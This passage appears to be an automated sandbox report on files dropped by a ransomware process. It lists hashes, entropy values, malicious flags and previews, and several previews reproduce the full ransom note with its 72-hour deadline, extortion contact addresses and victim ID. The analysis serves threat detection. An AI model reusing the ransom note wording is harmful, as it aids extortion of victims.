                                                                                                                                              Preview:.R.f.'|Q.C....#^=R.....S.m.....4.C.m.e.06...ck..f..........hr......u.S...,A..J..1..............KC.J..#.s...oP......#Pq..-.u.m.E....9....s|R.X.H.5s..,.U........!...G.Y..;.*.pQ........0....<K.'...&{..x~........&..Vj.L.;.{...........|~A..A.U.e.....}.<...N|..K..9....U....67..z.,.#.jv...}........../.;_j..~..D.....FF.....Y<&KL..B...$...T._#.].../.cC.F.x.d.....SPVA......&H...:...s.A..p.9#8.*..jP.%).L.&#&b.SDQ7....<L0G.vG..bzL..[..t.......VP.c.6...5...xd....I.\(...,1.`.Tm.....?3._a..".:\.j.E..A..Q=h...:m..r.q.<.......ZK...3...4..m4.g.....z..1e~$...-.Hao...<....'}.p.V..b2...)...z......;BT..]....=.l..c......3.E....].(3.x..Q.hdr....l.Z...i.m.L.v>..A...bbU. \tj.a..m.r..u..#.Q.....O.....Q....../..KC.2.5 ....g....7..W.I..V(..8_....H..6........7.<oD....\W.. 0.F..."*...:..l...p...k...4.*D.e.~.T[.~M(+.E....d.u.......V....`.B[....O-.mh6V.{.m.,.S.:.....n..Q.f.+..F....I.}.z.......C.-..6.z.....H..C.-.G.y2)<.t...59..c..o.....a.2(..w.yb&..k+.{.G.p. -
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.168006823273343
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:U56aURJcRHG7K84SlK5PXR0zycgjaxWtt7MoriJafZ9dsEWWVF0zJmn:B5JcH0zycgjaxitcafZ9SERVF8Jmn
                                                                                                                                              MD5:E684665BACCFCD972FFFE0072F15313E
                                                                                                                                              SHA1:C1C1DAFA584E1E57E63C89EF9CA0A8AD01290E68
                                                                                                                                              SHA-256:7579C95B42F610A2656A4446488EA2354676D485F2E550965023C9DA46C4B883
                                                                                                                                              SHA-512:A30F00851A5A9426BFF1A77F32E79C03F400DF42DEB9A033A11D17D1D6AE741905A852664B3F7A594927BCE5BB4203188F2C6EEAD798F4C59F81AD8158872CBB
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:3\.)Y.!c%NXZ.[:~...........QN...#...U..E&.....^..~..........1....\..x#.[..b.*.&.......).Lr......s{V.|.J.!cN_..&.C.i.O..8..j..4.V..uA$_.(.".3x.2o...C.T...B...(..f_.A.....yz...<C..6MnX.I..08.q........BnNC1..;5....:.U...2.bZ.?........R<....z...2f*s..N.:$...5d..,.tDN.Y\..0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49418
                                                                                                                                              Entropy (8bit):1.1549496620404751
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:oKeWuVW6oV3Yr/whToUjEn7/Mrn4GueDcbDCpGnpAb:oSuEFgwhTo4E7UFDcbDvpw
                                                                                                                                              MD5:D71A1A3B6F04C6AE677E7F0F51DA94E4
                                                                                                                                              SHA1:F890F8989465568B0DC1DFED914BFC5FC9E0B57F
                                                                                                                                              SHA-256:4900A76511014404764BE011FA543D245B93C49BE74E12E3E1F2B88622160594
                                                                                                                                              SHA-512:ACD9F103338B4C7B54BEF836BC17FA0B4BA8516219AE2C9F603193FB85437C068850FEB04D4F29293114E771D4BE6ACCF97ED9D60A9BCBB4C28F0E53316BA543
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.b;.....q....... .6..Dp/.........7..?{..1.m...H.r.Id<160._..d".(6w..S.6!.+..g..ly:....`.3.Gb.....u0+Y.L...|.:s...tC3.M.Q...B....2+.i.e(.n..^Ka....=..V.|.......].a.z...7.}.iy..Ok.9..l....h/>F..=.6...y...z5.v."...}...............h.....~........$37Pf.....W.D..!...N.;......z5h.%..*..y(....].{]\.[.o.......V(..v%|.U.%5..#'..;...A....X...x.&....X..[.8YJ.l.o7.O......B..H.ph.h.:.9z.B.>.q..Ao.P.[..x.A0 .]..,...E.l.QrT..K...8.. .G..<x..l.........a..(...!..hk4v..c\.I..~`...E./...^...A,..R{.V.....1...|..{.O.-..^&GcL....wr.....6.D.1....U(....T.{......'...z...;..$.m./.....!.e.4..9..^....`>.P...$......".g.1.~).L....s......os.B.....x....v...#].H.F...!4...H..._.....|XI...w.N..rX...4.....N.rl..3{..z...A.7`....K.&|......?..w4..+....5.U2...5u....&%....E.........9....\...P.-.Q..j..=....'@.!.r...v..C..._e.!.!...-..6Z...G..F`a.K....|_A>....].g.C#......^Y..4.[./.j......yVC.U...P/.i.....x(O..w.g..7.=.....=<n..8A?./...kx.L^..R9B.4...}Z..[-}j...V.Dn...9.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49418
                                                                                                                                              Entropy (8bit):1.1671012260683755
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:5c7ydc/lDvkar+7DhWZ4JHQ4KS/GYlLA4mqjcH4bUoKrN3Vj:Yydc/lD0DUIHaSp9jcYbANlj
                                                                                                                                              MD5:315DC1603D718144947633C44CF5F514
                                                                                                                                              SHA1:7CC53483AA3276A5C49B68B0B152B5703A83C7E2
                                                                                                                                              SHA-256:3A78129D23D77AFCBB312656D77974A051FE7705DC32D1AAF575133FF4DF5554
                                                                                                                                              SHA-512:34EF31A8CF0CC7D89E70EBBB4B510ECCDD8AE88B9986B1C2F939C11EBA64F5A810509F58CD58F34BBC518112FA72FE35E194A01FFA2F5374A199B7911F9E5ABA
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:..-...[...d.1(.oP..t........kd..iTfp8....O!...x...p..z.....;..,.u.b....rIk".IUS.%..<[|,y.........:.~.b9...5.Z p..C.m..!..y...p..O...*.......r.=... &..E..u.CK...y..U....1..x3..~Y".e...e.f.gk-......[.u.Ul....}..ku....b}.&/db!$..9.U.......XP.\....l..1....d.....F..R.s..).I..m....j!.3..%v#.e.d.XP.L...+..Q..G%A.j}.:&.C@..:...o.U.".I.{;9.+.B.(.;8...'..}.?HlG.y-xhC..."...1p....>.9?P.j.+%.......5.M.....*....0.c....*4.:.C-..&J.....VX..(.KJp...mMy\>.}..-7......C..Q.&...[@x.4.^t.#,...^..iJ_s;zR\..4.~.G......_.0_.QN..r..y.p<...o...._..K.o."U.=r.o......CA.'x.....`.........Al..E.....\.O..XC..0.JsK.D5(.kN..EI....&.....b...We..x.sOsBI@.\.J!y..|...$<GV'M..k91e..`...Up.C....-.P.~....v..h>{.U.%.w.L..e.;.l?W.....nd.4.w.U.1.j.(,$;.m...Yi.......Bz.r.,....$.Y..c.C}..3P.b_....Zasw....Z~4V....s..$...{zK.xa..pS.A.Hw..].........O.n+.......I.i<.M...^]J'...+......A.....b...XS.S...R.?7=......U.(..\.1S....xX.^.S6......w.~.F........V.W.l.l.,.....S)..O.A.....~.....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.6075948707400325
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:H7YXOwbVcQ+UdOLp7JhMDM/OgJWVixo2l6rZ2uGTsRepHljo3/:8lSBrJqDO6iqlgQRe5iv
                                                                                                                                              MD5:2296D90143286317EDD3CFABAB3419AF
                                                                                                                                              SHA1:D82D19E1C180BD09BB0083137EB440E9BE0AEB31
                                                                                                                                              SHA-256:79F52354A29295F0252E70E572A39674D7A17C4E23FBC4C78DA6519D23CABE0E
                                                                                                                                              SHA-512:26468C35ED82E5D9FE0BDE6F9911813EA24C96DE46087857E1EE9856F92BDD4CFE5030B6CA238642828DEFB00AF24805B96DF451D7BC3B408CFCE9933388EECB
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.U.F.C......Ta.l+.....+.c..V..p.+.Tn.Q..2.....5.....X...,..zRBs)x.3....X..r.b.!...Y.B.t............tS>!.......p....K.O....eI.Q.N..y.J...Oz.w.ZJ.c.A...<.."o..N.-%.5..'.vd.;kd...l..~.iky...l..}.'d!..Z.m..Q.pn..}/.`......R.c.v......c. m...h...+...T....%.a,.._...I..y.0..z.6.f..0.R...r.@...).j5.T9...i.r..X....1q.....E.S..,....`...cB.Q..%.K.1..v.a]v..\5;9+..[T...!......YWH...c?..Q8].1..v.F).....X.."..{.DM..F........Ny.M..$;.........x.(.'+........%....I..9........z7Fn.l.c.C.3B..S{.....#g..l.{...w.Ew....I....!.../......nO...f3..j7o_.S..%3F..9.X...qX....S;.W.Z }.....e...y.vg...*v.h....B.........4.XIP.a....7..e(Q.^q..9.../..vqf.YU.Cz.uq..m7..."Z..l<]?RW............8...}<..F.R.(..9.....`5.~SI.....i.F.v..Jg_)f.u..`vnK.5(.......K..n' |.*..Ux;.?..C".[.&.`..a.).c.........i.Y..e.J.f.M.7....I*z.+y..S."~5g9.0pN.....t0.H2.E... .n.E.#.!.3x."r..7E.^2.Y.."...2...D.X...H..I2r.*..Ep8#....f..)..O=.1++...?....Rh..$... :.7_Z/..`.0....{T..;.?...U.[...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.6075948707400325
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:H7YXOwbVcQ+UdOLp7JhMDM/OgJWVixo2l6rZ2uGTsRepHljo3/:8lSBrJqDO6iqlgQRe5iv
                                                                                                                                              MD5:2296D90143286317EDD3CFABAB3419AF
                                                                                                                                              SHA1:D82D19E1C180BD09BB0083137EB440E9BE0AEB31
                                                                                                                                              SHA-256:79F52354A29295F0252E70E572A39674D7A17C4E23FBC4C78DA6519D23CABE0E
                                                                                                                                              SHA-512:26468C35ED82E5D9FE0BDE6F9911813EA24C96DE46087857E1EE9856F92BDD4CFE5030B6CA238642828DEFB00AF24805B96DF451D7BC3B408CFCE9933388EECB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.U.F.C......Ta.l+.....+.c..V..p.+.Tn.Q..2.....5.....X...,..zRBs)x.3....X..r.b.!...Y.B.t............tS>!.......p....K.O....eI.Q.N..y.J...Oz.w.ZJ.c.A...<.."o..N.-%.5..'.vd.;kd...l..~.iky...l..}.'d!..Z.m..Q.pn..}/.`......R.c.v......c. m...h...+...T....%.a,.._...I..y.0..z.6.f..0.R...r.@...).j5.T9...i.r..X....1q.....E.S..,....`...cB.Q..%.K.1..v.a]v..\5;9+..[T...!......YWH...c?..Q8].1..v.F).....X.."..{.DM..F........Ny.M..$;.........x.(.'+........%....I..9........z7Fn.l.c.C.3B..S{.....#g..l.{...w.Ew....I....!.../......nO...f3..j7o_.S..%3F..9.X...qX....S;.W.Z }.....e...y.vg...*v.h....B.........4.XIP.a....7..e(Q.^q..9.../..vqf.YU.Cz.uq..m7..."Z..l<]?RW............8...}<..F.R.(..9.....`5.~SI.....i.F.v..Jg_)f.u..`vnK.5(.......K..n' |.*..Ux;.?..C".[.&.`..a.).c.........i.Y..e.J.f.M.7....I*z.+y..S."~5g9.0pN.....t0.H2.E... .n.E.#.!.3x."r..7E.^2.Y.."...2...D.X...H..I2r.*..Ep8#....f..)..O=.1++...?....Rh..$... :.7_Z/..`.0....{T..;.?...U.[...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.155987045861265
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:+1F/TFtCufPplQly7fPQRfwRzyRsjbbxQ4MK+RkHQo41Kl7+EfbJkNcmn:+jbnhfP88bPQRfazcsq5ruwB8CENmn
                                                                                                                                              MD5:4F6AE75BBDDB25A6E9F4D6442874026A
                                                                                                                                              SHA1:25C061334EEE6EAE4D1F2331C15F8CF9EBD81D65
                                                                                                                                              SHA-256:F468547CC395FCEE3CBF6CA4C6C522414CF222FFA4FD183E911C2D170649C8F0
                                                                                                                                              SHA-512:1FA6C1C6AE85BA8D93B128D94FBEB90C8706CCFA0D64A2165E9CD8452B70FB4EB1C232B16DE8662557BBC1B13F84FBF8DD7D3B4CF102A88B1D6CB4FECFE23AC3
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:fL\..9....rJI.............9;.q..0......vSith.K..0.."v......'...."1e.DD.>4._.........o..QH.j.Qe.i.Ca'...:.Y.:a.5.;..h...J.(,..qq-.M~.a........PEu....m..R.'&\*t...M..n...8..b...b.{h,.%..8.4.....7...D.H.L.8.g...,h..Z.....I..hf.IC..>....c.t"../.O.?.n1..y....1.=.ond.g..../.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49418
                                                                                                                                              Entropy (8bit):1.1671012260683755
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:5c7ydc/lDvkar+7DhWZ4JHQ4KS/GYlLA4mqjcH4bUoKrN3Vj:Yydc/lD0DUIHaSp9jcYbANlj
                                                                                                                                              MD5:315DC1603D718144947633C44CF5F514
                                                                                                                                              SHA1:7CC53483AA3276A5C49B68B0B152B5703A83C7E2
                                                                                                                                              SHA-256:3A78129D23D77AFCBB312656D77974A051FE7705DC32D1AAF575133FF4DF5554
                                                                                                                                              SHA-512:34EF31A8CF0CC7D89E70EBBB4B510ECCDD8AE88B9986B1C2F939C11EBA64F5A810509F58CD58F34BBC518112FA72FE35E194A01FFA2F5374A199B7911F9E5ABA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..-...[...d.1(.oP..t........kd..iTfp8....O!...x...p..z.....;..,.u.b....rIk".IUS.%..<[|,y.........:.~.b9...5.Z p..C.m..!..y...p..O...*.......r.=... &..E..u.CK...y..U....1..x3..~Y".e...e.f.gk-......[.u.Ul....}..ku....b}.&/db!$..9.U.......XP.\....l..1....d.....F..R.s..).I..m....j!.3..%v#.e.d.XP.L...+..Q..G%A.j}.:&.C@..:...o.U.".I.{;9.+.B.(.;8...'..}.?HlG.y-xhC..."...1p....>.9?P.j.+%.......5.M.....*....0.c....*4.:.C-..&J.....VX..(.KJp...mMy\>.}..-7......C..Q.&...[@x.4.^t.#,...^..iJ_s;zR\..4.~.G......_.0_.QN..r..y.p<...o...._..K.o."U.=r.o......CA.'x.....`.........Al..E.....\.O..XC..0.JsK.D5(.kN..EI....&.....b...We..x.sOsBI@.\.J!y..|...$<GV'M..k91e..`...Up.C....-.P.~....v..h>{.U.%.w.L..e.;.l?W.....nd.4.w.U.1.j.(,$;.m...Yi.......Bz.r.,....$.Y..c.C}..3P.b_....Zasw....Z~4V....s..$...{zK.xa..pS.A.Hw..].........O.n+.......I.i<.M...^]J'...+......A.....b...XS.S...R.?7=......U.(..\.1S....xX.^.S6......w.~.F........V.W.l.l.,.....S)..O.A.....~.....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49418
                                                                                                                                              Entropy (8bit):1.1505503486163593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:5VnICrXUVqbWYOFONQKPovvqNPtQ+DR42zBJ8C74tFUbhs:XIvq6mLNPtQAR4y4C74T6s
                                                                                                                                              MD5:32F01CF1060358F53B538C53813531F5
                                                                                                                                              SHA1:548D0B83C298A5F55D104A06AA0E9768029B1337
                                                                                                                                              SHA-256:D0C8EB7B2BE9A67BDFBAB4CA1424CD1FF7310CBADE1C5641C772C83B90DAF1D8
                                                                                                                                              SHA-512:E476DBE119F910E4F1B1F2A8E8F6AB603102AC72AF8A3F37BF60CFCD18F470E4AADBCF858D9A22D8907B2790FC0A27CFF26354936811F4832CB97755468FEF70
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.4g&....d.\"|.OR.F.GGC.....{...&06...1..2.....U..G2a)aC.r.2... +k..r.}V......~^.!..uA.....).cN....%|...R..IC.,....c.1.|3.......\.W.p\.."..."..^..{O.%6.m..??..!.>....(.c:..L....6.p..EEq........m..@Z.m.......8..e.Gk....../..&.....{Z.d.V.>xwZLx..\..=.n....h..hJ...sF-=..0..cefz..^.........j.O0.U.S..R.:.......k...`..#....j]R..N..x.......o...C...7..M.Q.....mR.....U.-....c....R.i.Gn......1#a_h...4uj...%%.C...:...y......BQS..h...[..M...%p.a.._@.G.`a.9.5w.|].I..6C.....W..Y<...g8...^^.....j..V2-.y...qqT..B6..>T..7..~.`.s._..+B.j..`.....S..]# .,...9......l.|..S...H......|..S..S.W.P....(qaZ:a..>5@lNj.#|\Y..._..}0.1.0....*.b.4d.~.g...=w...E)r2Z.[.t.R.m..h...M..B.'`...Y1N.......P.RE.}..K.q6....Be.y...W...r-......]..T......X.>..Kt.2.fd.=..hi.`..h6.~..../aQ.oU|..H....<.......Q)K.....{p1v[..;...P.8...1z.6Fk.E..s...9./..H....<..*O3?&^../5;.L.T.pk.OLTg....8....(E..p.F..W.7Z...v.<.z.[.`+4Cc......_..."YNd..bSO..>..^...J.=KF|b*....I;{.......4..3B.=..,m.j.T....F-cg.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.6067849271373578
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:mrru8dHkSVwpiU1OIbwgi6eRus1GKFwtuRCavJvU:mrrpZHVwpiZKRtRoGZtuRCos
                                                                                                                                              MD5:57B8438FA5C99961799947A26C1F0158
                                                                                                                                              SHA1:6A8269F8FABCE9CB97BD821AF8BDCB2B7FFA2578
                                                                                                                                              SHA-256:4907F089D9762DBAA8F38C517EA51F28FC5B86BBE23A24CE86D6DAA5CB4D8353
                                                                                                                                              SHA-512:80CBD7C7E12492DBD08B5F65B6B1796C51C5BFE9809ED585FF7744DE494CB32B9C690F2FB41CC0796323592C530E7840B549E19392EF9C2E086D2E93FE8AF0CA
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:}T....2...x..NVA<!.h..?Fh..D..M..Jy.....G...}A.0L.7..i......r.P.Fr....d..K2>....>....=...kG.8..W.j.e..V...<m....;..%{.=..I.....E.S.a.T..u.nmq...B.`.*.sY...D..o..V.*...W.r..[5.._.d...\...{....<....{......5.(....e.......c.....7%E..n....TPe.......!..z~.7.mT'..J.'.6O./....JTL.......jd\.@x.q.&...{....P...O......`.n.2..3..HU%...!...:\...(.C..9.I5.....D.(.....^q!9..1...;...qJ..p.IZ./P..G.:(..-`.n...Z.....A.&wJ.=B....D.>....(w.hkk...cb=.~Q.\J...q.....L._2.d}\"y8.1U.S.-._v..~fQ...[#Q..^....%...^.....kT.......R6..S......t......U.......Y./.d...$...<.Q...eh.S.lh.`M..y....H..../.lZ.,G.?.CC...'.R.....#7.".+T.j.m <+`.nq[.S.......Q.E3V.A.[...%P.qx..+..=..A.H=...i._.ypl..]^.#...AwY?5....D.'...K....G..0`.8.T.n..P.....?.F.*S....29t<To.0>vz.....U.....]..Ih.;x....$2.yT.a.6G...M]g...........cy.<N...P.K........u.=@....N..c.....)...Tq....Gv'.....!..'.BCe.!....<F.}.....Z.4.A...d.....\...@)....W.i....m....u..X.5..^.}]./.2L:.....N.-e..ay...)...8A.j.gJ..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.6067849271373578
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:mrru8dHkSVwpiU1OIbwgi6eRus1GKFwtuRCavJvU:mrrpZHVwpiZKRtRoGZtuRCos
                                                                                                                                              MD5:57B8438FA5C99961799947A26C1F0158
                                                                                                                                              SHA1:6A8269F8FABCE9CB97BD821AF8BDCB2B7FFA2578
                                                                                                                                              SHA-256:4907F089D9762DBAA8F38C517EA51F28FC5B86BBE23A24CE86D6DAA5CB4D8353
                                                                                                                                              SHA-512:80CBD7C7E12492DBD08B5F65B6B1796C51C5BFE9809ED585FF7744DE494CB32B9C690F2FB41CC0796323592C530E7840B549E19392EF9C2E086D2E93FE8AF0CA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:}T....2...x..NVA<!.h..?Fh..D..M..Jy.....G...}A.0L.7..i......r.P.Fr....d..K2>....>....=...kG.8..W.j.e..V...<m....;..%{.=..I.....E.S.a.T..u.nmq...B.`.*.sY...D..o..V.*...W.r..[5.._.d...\...{....<....{......5.(....e.......c.....7%E..n....TPe.......!..z~.7.mT'..J.'.6O./....JTL.......jd\.@x.q.&...{....P...O......`.n.2..3..HU%...!...:\...(.C..9.I5.....D.(.....^q!9..1...;...qJ..p.IZ./P..G.:(..-`.n...Z.....A.&wJ.=B....D.>....(w.hkk...cb=.~Q.\J...q.....L._2.d}\"y8.1U.S.-._v..~fQ...[#Q..^....%...^.....kT.......R6..S......t......U.......Y./.d...$...<.Q...eh.S.lh.`M..y....H..../.lZ.,G.?.CC...'.R.....#7.".+T.j.m <+`.nq[.S.......Q.E3V.A.[...%P.qx..+..=..A.H=...i._.ypl..]^.#...AwY?5....D.'...K....G..0`.8.T.n..P.....?.F.*S....29t<To.0>vz.....U.....]..Ih.;x....$2.yT.a.6G...M]g...........cy.<N...P.K........u.=@....N..c.....)...Tq....Gv'.....!..'.BCe.!....<F.}.....Z.4.A...d.....\...@)....W.i....m....u..X.5..^.}]./.2L:.....N.-e..ay...)...8A.j.gJ..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.081892963589345
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:1ygyAdH3WDhjKk4dhMZIZEaxtzllf+DtKdJKZAeQShhF51GWHn:QgyAFGFKk4dhMZ0itKdJKSeQmhF55Hn
                                                                                                                                              MD5:72C0845286377B613089562B971DAF93
                                                                                                                                              SHA1:D4B7B00B1953E7507D556779DA49FFDED0074ABF
                                                                                                                                              SHA-256:E2C93D1A08AEC51DB51E7DBC6E4A66A720ED22926C78A7EDEDDB72226C9B7941
                                                                                                                                              SHA-512:C8A1C98784BEA23A961118CCF8B8DF53067FD2B9E525799D6CBCA8FDF2296DD244091C6ED8B1D8BE4424FB5A65264882AD4F9B0E31B7F8F1445DBF736EF0D26E
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:......j.l.wt.rX..........d.Lk.\.!&.b.?.n.....C.=..<..^A..%..a.....&A.6>/.V..V.......u...qG7....f..+....!.....q.Z.+..+.|...O..Q..m.....R..0GIJY.pu...w.k.0.,7Z?.P...V...,.p.4..]...|.......+JB.,...}..=......w.4)....[l...m.T.....I....gzz:=..\.~.G.`.k...p.V.\...F..T.E.W...!.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49418
                                                                                                                                              Entropy (8bit):1.1505503486163593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:5VnICrXUVqbWYOFONQKPovvqNPtQ+DR42zBJ8C74tFUbhs:XIvq6mLNPtQAR4y4C74T6s
                                                                                                                                              MD5:32F01CF1060358F53B538C53813531F5
                                                                                                                                              SHA1:548D0B83C298A5F55D104A06AA0E9768029B1337
                                                                                                                                              SHA-256:D0C8EB7B2BE9A67BDFBAB4CA1424CD1FF7310CBADE1C5641C772C83B90DAF1D8
                                                                                                                                              SHA-512:E476DBE119F910E4F1B1F2A8E8F6AB603102AC72AF8A3F37BF60CFCD18F470E4AADBCF858D9A22D8907B2790FC0A27CFF26354936811F4832CB97755468FEF70
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.4g&....d.\"|.OR.F.GGC.....{...&06...1..2.....U..G2a)aC.r.2... +k..r.}V......~^.!..uA.....).cN....%|...R..IC.,....c.1.|3.......\.W.p\.."..."..^..{O.%6.m..??..!.>....(.c:..L....6.p..EEq........m..@Z.m.......8..e.Gk....../..&.....{Z.d.V.>xwZLx..\..=.n....h..hJ...sF-=..0..cefz..^.........j.O0.U.S..R.:.......k...`..#....j]R..N..x.......o...C...7..M.Q.....mR.....U.-....c....R.i.Gn......1#a_h...4uj...%%.C...:...y......BQS..h...[..M...%p.a.._@.G.`a.9.5w.|].I..6C.....W..Y<...g8...^^.....j..V2-.y...qqT..B6..>T..7..~.`.s._..+B.j..`.....S..]# .,...9......l.|..S...H......|..S..S.W.P....(qaZ:a..>5@lNj.#|\Y..._..}0.1.0....*.b.4d.~.g...=w...E)r2Z.[.t.R.m..h...M..B.'`...Y1N.......P.RE.}..K.q6....Be.y...W...r-......]..T......X.>..Kt.2.fd.=..hi.`..h6.~..../aQ.oU|..H....<.......Q)K.....{p1v[..;...P.8...1z.6Fk.E..s...9./..H....<..*O3?&^../5;.L.T.pk.OLTg....8....(E..p.F..W.7Z...v.<.z.[.`+4Cc......_..."YNd..bSO..>..^...J.=KF|b*....I;{.......4..3B.=..,m.j.T....F-cg.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
